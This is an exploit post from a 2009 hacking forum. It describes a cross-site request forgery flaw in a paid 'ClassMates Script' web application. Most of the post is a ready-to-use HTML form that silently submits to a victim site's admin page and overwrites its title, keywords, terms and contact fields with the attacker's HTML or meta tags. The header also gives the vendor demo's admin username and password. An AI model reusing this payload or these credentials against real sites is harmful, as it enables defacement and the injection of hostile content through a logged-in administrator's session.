ClassMate Script ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > ClassMate Script ~ XSRF Vuln.

Madde
	Author : Bug Researchers/BARCOD3
	Date : 04.11.2009 23:46:14
	# ClassMate Script ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : ClassMates Script # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak victim.com’a meta atilabilir. # Script Price : $35 # author : BARCOD3 - Bug Researchers # Demo : http://www.availscript.com/classmate/admin/ or http://www.availscript.com/classmate_script.php Admin; admin password ; 123 ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <h3>BARCOD3</h3> <form name=frmSite action=victim.com/formunpostedildigisayfa.php method=post onSubmit=return validateAdmin()> <input type=text class=textbox_11_Normal name=txtName value=Ozkanbozkurt.com > <input type=text class=textbox_11_Normal name=txtTitle value=SiteBasligi > <input type=text class=textbox_11_Normal name=txtKeywords value=SiteKeywords > <textarea name=txtDesc disabled rows=7 cols=36>Description or ur HTML codes </textarea> <input type=text class=textbox_11_Normal name=txtBG value=#FFFFFF > <textarea name=txtTerms rows=7 disabled cols=36>ur HTML codes</textarea> <textarea name=txtTesti rows=7 cols=36 disabled>ur HTML codes/meta</textarea> <textarea name=txtContact rows=7 cols=36 disabled>ur HTML codes/Meta </textarea> <input type=text class=textbox_11_Normal name=txtEmail value=Ur HTML codes > <input type=submit name=btnSave value= Save > </form> < -- bug code end of -- >